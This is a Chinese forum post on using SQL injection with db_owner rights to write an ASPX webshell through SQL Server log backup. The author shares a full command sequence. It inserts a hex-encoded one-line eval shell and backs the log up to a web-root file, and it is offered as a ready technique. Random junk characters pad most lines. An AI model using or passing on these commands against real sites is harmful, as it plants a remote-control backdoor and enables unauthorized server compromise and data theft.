最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。+ J1 K: Q3 v& S1 k' Q9 U) } t
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。. Q+ W# E1 R, J7 ^6 N) Y
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。9 g* K* U* P. ]3 g" v2 M3 F- Z
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。( H- e7 r3 r, u) b$ a
* ~* W6 [) B& ~+ R! f
--------------------------------------------------------------' z3 O* r9 I. O. i. u2 G
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错, x% X* Z* \, n4 v7 g! o8 I
自己修改备份语句如下:
+ }, T: d( c4 \+ G, dDrop table cmd;--
. k) K' ]3 Z' K. C; C; b% Halter database db_test set RECOVERY FULL;--
$ Q9 v# \5 W$ @' N* _* c8 d: Xcreate table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
' }: T! r E" u! ^. a) H( Obackup log db_test to disk = 'c:\bak' with init;--
9 c1 I5 g: a6 w8 Z, M- iinsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
+ g5 y0 ]1 Q! E' Zdelete from cmd where id>1;--删除id>1的数据
4 W1 y+ B! r1 `# c, vbackup log db_test to disk = 'e:\webroot\test.aspx';--0 O4 l0 l/ x2 L2 h7 {. [5 D
Drop table cmd;--
; @+ I+ o: L7 u. B# g希望对大家有用。 |